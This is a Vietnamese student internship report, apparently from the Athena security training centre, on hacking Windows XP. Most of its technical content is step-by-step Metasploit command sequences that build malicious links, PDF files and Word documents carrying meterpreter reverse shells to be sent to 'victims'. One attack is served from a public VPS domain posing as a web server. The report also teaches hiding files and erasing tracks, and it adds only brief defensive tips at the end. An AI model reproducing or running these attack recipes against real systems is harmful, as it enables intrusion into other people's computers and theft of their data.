SlideShare una empresa de Scribd logo
1 de 28
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÁO CÁO THỰC TẬP DOANH NGHIỆP
SYSTEM HACKING
Giảng viên hướng dẫn: Võ Đỗ Thắng.
Sinh viên thực hiện: Dương Đình Tú.
TP. Hồ Chí Minh, tháng 11 năm 2013
Athena Center
SVTH: Dương Đình Tú Trang 2
MỞ ĐẦU
Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có
2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có
khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu
phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ,
từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu
mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ
quan đơn vị nghiên cứu, các doanh nghiệp…Theo nhìn nhận của Bkav, đã có những
chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các
vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do
thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số
vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng
về hình thức, tinh vi hơn về công nghệ.
Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng
chỉ đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số.
Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông
tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến
việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc
phòng, an ninh.
Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng
để tấn công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều
hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà
Hacker sử dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông
tin, bảo mật trong thời đại Internet ngày nay.
Dương Đình Tú.
Athena Center
SVTH: Dương Đình Tú Trang 3
LỜI CẢM ƠN
Để thực hiện và hoàn thành đề tài này, trước hết tôi xin cảm ơn đến các thầy,
giảng viên hướng dẫn sinh viên thực tập tại Trung tâm đào tạo quản trị mạng và an
ninh mạng quốc tế ATHENA, đã tận tình chỉ bảo trong thời gian vừa qua.
Tôi cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm
và tạo điều kiện cho tôi hoàn thành đề tài này.
Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy
cô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề tôi rút kinh nghiệm trong
các công trình tìm hiểu, phát triển sau này.
Sinh viên
Dương Đình Tú.
Athena Center
SVTH: Dương Đình Tú Trang 4
MỤC LỤC
MỞ ĐẦU.....................................................................................................................................1
LỜI CẢM ƠN ............................................................................................................................3
PHẦN 1: GIỚI THIỆU .............................................................................................................1
1.1 System Hacking và Tình hình an ninh mạng Việt Nam................................................................. 1
1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows.......................................................... 1
1.3 Quá trình tấn công vào một hệ thống............................................................................................. 2
(hình 1.1: Quá trình tấn công vào một hệ thống) ......................................................................... 2
PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG
LAN.............................................................................................................................................4
2.1 Hệ điều hành Backtrack 5 R3......................................................................................................... 4
2.2 Phần mềm Metasploit..................................................................................................................... 6
2.2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai
thác................................................................................................................................................... 6
2.2.2 Cấu hình Module exploit đã chọn: .......................................................................................... 7
2.2.3 Verify những options vừa cấu hình:........................................................................................ 7
2.2.4 Lựa chọn target: ...................................................................................................................... 7
2.2.5 Lựa chọn payload:................................................................................................................... 7
2.2.6 Thực thi exploit:...................................................................................................................... 7
2.3 Sơ đồ tổng quan hệ thống mạng LAN............................................................................................ 8
(Hình 2.1: Sơ đồ tổng quan hệ thống mạng LAN)....................................................................... 8
2.4 Xâm nhập và khai thác Windows XP............................................................................................. 9
2.4.1 Lỗ hổng sử dụng: Ms12_004................................................................................................... 9
(hình 2.2: Lỗ hổng sử dụng: Ms12_004).................................................................................... 10
(hình 2.3: Lỗ hổng sử dụng: Ms12_004).................................................................................... 10
2.4.2 Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2........................................................ 12
(hình 2.5: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)........................................... 12
(hình 2.6: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)........................................... 13
(hình 2.7: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)........................................... 14
2.4.3 Lỗ hổng sử dụng: file WORD phiên bản word 2007 ............................................................ 14
Athena Center
SVTH: Dương Đình Tú Trang 5
(hình 2.8: Lỗ hổng sử dụng: file WORD phiên bản word 2007) ............................................... 15
(hình 2.9: Lỗ hổng sử dụng: file WORD phiên bản word 2007) ............................................... 16
(hình 2.10: Lỗ hổng sử dụng: file WORD phiên bản word 2007).............................................. 16
PHẦN 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA
QUA MẠNG INTERNET.......................................................................................................17
3.1 Honeypot ..................................................................................................................................... 17
3.2 Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet........................................... 17
(hình 3.1: sơ đồ tổng quan sử dụng Honepot)............................................................................ 17
(hình 3.2: Công cụ metasploit) ................................................................................................... 18
3.3 Tấn công hệ điều hành Windows XP .......................................................................................... 19
3.3.1 Xâm nhập và khai thác hệ thống.......................................................................................... 19
(hình3.3: Ping đến trang google.com)........................................................................................ 19
(hình3.4 gửi Trojan về máy mục tiêu)- Bây giờta có thể tiến hành khai thác tại máy mục tiêu:20
(Hình 3.5: Khai thác thông tin từmáy mục tiêu) ........................................................................ 21
PHẦN 4: TỔNG KẾT .............................................................................................................22
DANH MỤC TÀI LIỆU THAM KHẢO ...............................................................................23
Athena Center
SVTH: Dương Đình Tú Trang 1
PHẦN 1: GIỚI THIỆU
1.1 System Hacking và Tình hình an ninh mạng Việt Nam
System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần
mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành
Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những
log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ
trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ
chức.
1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows
Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã.
Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa
những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker
sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng
để khởi động chương trình của họ một cách tự động trên máy tính của bạn.
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành,
các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ
hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản
trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà
mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ
thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo
mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của
hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày
càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của
Microsoft.
Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy
cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc
Athena Center
SVTH: Dương Đình Tú Trang 2
hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit,
đang ngày càng phổ biến nhanh chóng.
Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH
Windows, Internet Explorer, Windows Server, Microsoft Exchange và .NetFramework.
1.3 Quá trình tấn công vào một hệ thống
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu
phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó,
có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:
(hình 1.1: Quá trình tấn công vào một hệ thống)
Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ
thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu
ích, chính xác hơn.
Athena Center
SVTH: Dương Đình Tú Trang 3
Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng
ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục
tiêu phải đạt tới là quyền truy cập vào hệ thống.
Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user
binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.
Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước
malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.
Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải
được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên
quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá
trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như
Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng
cho mục đích truy tìm thông tin.
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn
công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào
được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu,
chạy chương trình trojan, keylogger…
Athena Center
SVTH: Dương Đình Tú Trang 4
PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM
NHẬP TRONG MẠNG LAN
2.1 Hệ điều hành Backtrack 5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để
thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của
Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản
hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10.
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác
nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas
M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại
Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự
kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử
nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có
thể được phân loại như sau:
Information gathering: loại này có chứa một số công cụ có thể được sử dụng để
có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail,
trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông
tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra
các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và
cũng làm portscanning.
Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các
công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng
chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và
Simple Network Management Protocol (SNMP).
Athena Center
SVTH: Dương Đình Tú Trang 5
Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng
tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.
Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các
máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng
cao đặc quyền của chúng ta cho các đặc quyền cao nhất.
Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc
duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có
được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để
duy trì quyền truy cập.
Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp
trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình
đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các
tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ
rối chương trình một hoặc tháo rời một tập tin thực thi.
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/
Athena Center
SVTH: Dương Đình Tú Trang 6
2.2 Phần mềm Metasploit
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ
hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện
tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm tra, tấn công
và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối
tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit
có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta có thể
download chương trình tại www.metasploit.com.
Metasploit hỗ trợ nhiều giao diện với người dùng:
Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các
dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.
Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện
Web.
Command line interface: dùng msfcli.
Metasploit Enviroment:
Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những
options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module
exploits.
Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset,
enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng
đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông
qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi
user interface được thực hiện.
Sử dụng Metasploit Framework:
2.2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có
hỗ trợ để khai thác
Show exploits: xem các module exploit mà framework có hỗ trợ.
Athena Center
SVTH: Dương Đình Tú Trang 7
Use exploit_name: chọn module exploit.
Info exploit_name: xem thông tin về module exploit.
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên
www.metasploit.com hoặc qua lệnh msfupdate hoặc svnupdat/opt/metasploit/msf3/.
2.2.2 Cấu hình Module exploit đã chọn:
show options: Xác định những options nào cần cấu hình.
set: cấu hình cho những option của module đó.
Một vài module còn có những advanced options, chúng ta có thể xem bằng cách
gõ dòng lệnh show advanceds.
2.2.3 Verify những options vừa cấu hình:
check: kiểm tra xem những option đã được set chính xác chưa.
2.2.4 Lựa chọn target:
show targets: những target được cung cấp bởi module đó.
set: xác định target nào.
2.2.5 Lựa chọn payload:
show payloads: liệt kê ra những payload của module exploit hiện tại.
info payload_name: xem thông tin chi tiết về payload đó.
set payload payload_name: xác định payload module name. Sau khi lựa chọn
payload nào, dùng lệnh show options để xem những options của payload đó.
show advanced: xem những advanced options của payload đó.
2.2.6 Thực thi exploit:
exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho
chúng ta những thông tin về hệ thống được khai thác.
Athena Center
SVTH: Dương Đình Tú Trang 8
2.3 Sơ đồ tổng quan hệ thống mạng LAN
(Hình 2.1: Sơ đồ tổng quan hệ thống mạng LAN)
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng
cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính
trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin,
máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có
thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP
các host có trong mạng.
Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện
mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được
cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên
mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều
hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc
tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các
hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac
OSX.
Athena Center
SVTH: Dương Đình Tú Trang 9
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ
quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác
truy cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại
địa chỉ http://www.nessus.org/.
Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ
thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files,
thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/
backdoor, …
2.4 Xâm nhập và khai thác Windows XP
2.4.1Lỗ hổng sử dụng: Ms12_004
Khởi động msfconsole tử cửa sổ terminal của BackTrack
Khai báo lỗ hổng sử dụng và thiết đặt options:
o Search ms12_004
o use exploit/windows/browser/ms12_004_midi
o show options
o set SRVHOST 192.168.159.128
o set PAYLOAD windows/meterpreter/reverse_tcp
o set LHOST 192.168.159.128
o exploit
Athena Center
SVTH: Dương Đình Tú Trang 10
(hình 2.2: Lỗ hổng sử dụng: Ms12_004)
BackTrack sẽ tạo ra một link chứa mã độc (http://192.168.159.128:4444). Chỉ
cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy
nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.
(hình 2.3: Lỗ hổng sử dụng: Ms12_004)
Athena Center
SVTH: Dương Đình Tú Trang 11
Tiến hành khai thác máy nạn nhân có IP: 192.168.159.129 port 1078.
sessions
sessions –i 1
getuid
sysinfo
(hình 2.4: Lỗ hổng sử dụng: Ms12_004)
Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2
Nạn nhân:
Computer: HUUANHH-9091FB1
Os: Windows XP (Build 2600. Service Pack 2).
Architecture: x86.
Systemlanguage: en US.
Meterpreter: x86/win32
Athena Center
SVTH: Dương Đình Tú Trang 12
2.4.2Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2
Khởi động msfconsole tử cửa sổ terminal của BackTrack.
Khai báo lỗ hổng sử dụng và thiết đặt options:
o Search nojs
o use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
o show options
o set FILENAME test.pdf (đây là tên do mình tự đặt với cú pháp *.pdf)
o set PAYLOAD windows/meterpreter/reverse_tcp
o set LHOST 192.168.159.128
o set LPORT 4444
o exploit
(hình 2.5: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)
- Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file pdf có chứa mã
độc, file sẽ được lưu tại root./msf4/test.pdf
- Tiếp tục thực hiện các bước sau:
Athena Center
SVTH: Dương Đình Tú Trang 13
Use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.159.128
exploit
(hình 2.6: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)
Athena Center
SVTH: Dương Đình Tú Trang 14
- Tới đây chúng ta bắt đầu gửi file pdf vừa tạo cho máy nạn nhân, khi nạn nhân
mở file backtrack sẽ gửi mã độc và chiếm được quyền sử dụng máy nạn nhân.
(hình 2.7: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)
- Tới đây chúng ta đã chiếm được quyền sử dụng của máy nạn nhân.
2.4.3Lỗ hổng sử dụng: file WORD phiên bản word 2007
Khởi động msfconsole tử cửa sổ terminal của BackTrack.
Khai báo lỗ hổng sử dụng và thiết đặt options:
o Search ms12_027
o use exploit/windows/fileformat/ms12_027_mscomctl_bof
o show options
o set FILENAME test.doc (đây là tên do mình tự đặt với cú pháp *.pdf)
o set PAYLOAD windows/meterpreter/reverse_tcp
o set LHOST 192.168.159.128
o exploit
Athena Center
SVTH: Dương Đình Tú Trang 15
(hình 2.8: Lỗ hổng sử dụng: file WORD phiên bản word 2007)
- Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa mã
độc, file sẽ được lưu tại root./msf4/test.doc
- Tiếp tục thực hiện các bước sau:
Use exploit/multi/handler
Set payload /windows/meterpreter/reverse_tcp
Set lhost 192.168.158.128
Exploit
Athena Center
SVTH: Dương Đình Tú Trang 16
(hình 2.9: Lỗ hổng sử dụng: file WORD phiên bản word 2007)
- Sau khi thực hiện các bước trên, chúng ta bắt đầu gửi file word qua cho máy nạn
nhân, khi nạn nhân mở file word backtrack sẽ tự động gửi mã độc qua và chúng
ta có thể chiếm quyền sử dụng máy nạn nhân
(hình 2.10: Lỗ hổng sử dụng: file WORD phiên bản word 2007)
Athena Center
SVTH: Dương Đình Tú Trang 17
PHẦN 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP
LỖ HỔNG TỪ XA QUA MẠNG INTERNET
3.1 Honeypot
Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả
dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của
chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông tin
có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là Mail
Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với tin
tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn công
hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để xâm
nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ ảo
(VPS) và cài đặt Honeypot để giả dạng là một Web server bình thường, từ đó đánh lừa
máy nạn nhân khi một máy tính bất kỳ có kết nối Internet truy cập vào địa chỉ mà VPS
cung cấp.
3.2 Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet
(hình 3.1: sơ đồ tổng quan sử dụng Honepot)
Athena Center
SVTH: Dương Đình Tú Trang 18
Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:
- VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại
http://metasploit.org) đóng vai trò là một Honeypot trên mạng.
(hình 3.2: Công cụ metasploit)
Athena Center
SVTH: Dương Đình Tú Trang 19
3.3 Tấn công hệ điều hành Windows XP
3.3.1 Xâm nhập và khai thác hệ thống
(hình3.3: Ping đến trang google.com)
Lỗ hổng khai thác: Ms 06_067. Điều kiện: Windows XP without service pack, trình
duyệt Internet Explorer 6.0
- Tại cửa sổ Metasploit console, ta sử dụng các lệnh sau để tạo một server lắng nghe
các sự truy cập từ bên ngoài
use exploit/windows/browser/ms06_067_keyframe (Sử dụng lỗi Ms06_067)
show options (Xem thông tin thiết đặt)
set srvhost ptuananh.tk (VPS được đăng ký domain là http://ptuananh.tk )
set lhost ptuananh.tk
Athena Center
SVTH: Dương Đình Tú Trang 20
set uripath winxp (Đường dẫn kèm theo Domain, nếu để mặc định, metasploit sẽ
chọn ngẫu nhiên đường dẫn bất kỳ)
set srvport 80 (Chọn port 80, VPS như một Web Server, tránh sự nghi ngờ của
người dùng)
set payload windows/meterpreter/reverse_tcp
exploit
- Công việc tiếp theo là chờ cho máy mục tiêu truy cập vào địa chỉ:
http://ptuananh.tk/winxp . Ngay lúc đó, server trên VPS chúng ta sẽ tiến hành gửi
trojan về máy mục tiêu.
(hình3.4 gửi Trojan về máy mục tiêu)
Athena Center
SVTH: Dương Đình Tú Trang 21
- Bây giờ ta có thể tiến hành khai thác tại máy mục tiêu:
b) Phương pháp khắc phục lỗ hổng
Để khắc phục lỗ hổng Ms06_067, máy tính người dùng cần cập nhật các bản
Service pack (1 hoặc 2 hoặc 3) của Microsoft dành cho Windows XP.
(Hình 3.5: Khai thác thông tin từ máy mục tiêu)
Athena Center
SVTH: Dương Đình Tú Trang 22
PHẦN 4: TỔNG KẾT
Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sửdụng
máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và
phòng tránh việc Hacker đánh cắp Mật khẩu nhưsau:
Mật khẩu phải được đặt nhiều hơn 8 ký tựvà phải là tổng hợp giữa chữhoa, chữ
thường, số và ký tựđặc biệt để các chương trình khó dò ra.
Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu
dưới dạng NTLM để các chương trình khó khăn để dò tim. Bật lên 1 ởkhóa:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaNoLMHash
Người dùng admin nên xóa tập tin sam trong thưmục Windows/repair sau mỗi lần
backup dữliệu bằng rdisk.
Trong quá trình sử dụng máy tính để truy cập Internet, người dùng cần lưu ý:
Không mởtập tin đính kèm thưđiện tửcó nguồn gốc không rõ ràng hoặc không tin
cậy.
Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình.
Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của
bạn có chức năng cập nhật "live" (tựđộng cập nhật trực tuyến).
Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng
như người dùng có kinh nghiệm có thể phân tích chiếc máy tính của mình xem liệu nó
có đang bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập,
người dùng có thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có
những biểu hiện đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find.
Athena Center
SVTH: Dương Đình Tú Trang 23
DANH MỤC TÀI LIỆU THAM KHẢO
1. Nguyễn Sơn Khê, Đỗ Tấn Phát, Nguyễn Cao Thắng, Athena-Su dung
BackTrack 5 khai thác lỗ hổng mạng.
2. http://www.hackyshacky.com/2013/03/how-to-hack-facebook-with-backtrack-
5.html
3. https://www.youtube.com/watch?v=_AKCmLvN1Sg
4. http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may-tinh-trong-
mang-lan-bang-backtrack-5.html
5. https://www.youtube.com/watch?v=gqrEZ7n1Gns

Más contenido relacionado

La actualidad más candente

Giáo trình an toàn thông tin ths.nguyễn công nhật[bookbooming.com]
Giáo trình an toàn thông tin   ths.nguyễn công nhật[bookbooming.com]Giáo trình an toàn thông tin   ths.nguyễn công nhật[bookbooming.com]
Giáo trình an toàn thông tin ths.nguyễn công nhật[bookbooming.com]bookbooming1
 
Hướng dan su dung packet tracer
Hướng dan su dung packet tracerHướng dan su dung packet tracer
Hướng dan su dung packet tracerDuc Nguyen
 
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort idsKịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort idsLinh Hoang
 
Slide bai giang_an_toan_va_bao_mat_thong_tin
Slide bai giang_an_toan_va_bao_mat_thong_tinSlide bai giang_an_toan_va_bao_mat_thong_tin
Slide bai giang_an_toan_va_bao_mat_thong_tinLang Codon
 
IDS Snort/SnortSam
IDS Snort/SnortSamIDS Snort/SnortSam
IDS Snort/SnortSamTiki.vn
 
Bao cao tttn an ninh web
Bao cao tttn   an ninh webBao cao tttn   an ninh web
Bao cao tttn an ninh webNhóc Mèo
 
Cơ sở an toàn thông tin chương 2
Cơ sở an toàn thông tin chương 2Cơ sở an toàn thông tin chương 2
Cơ sở an toàn thông tin chương 2NguynMinh294
 
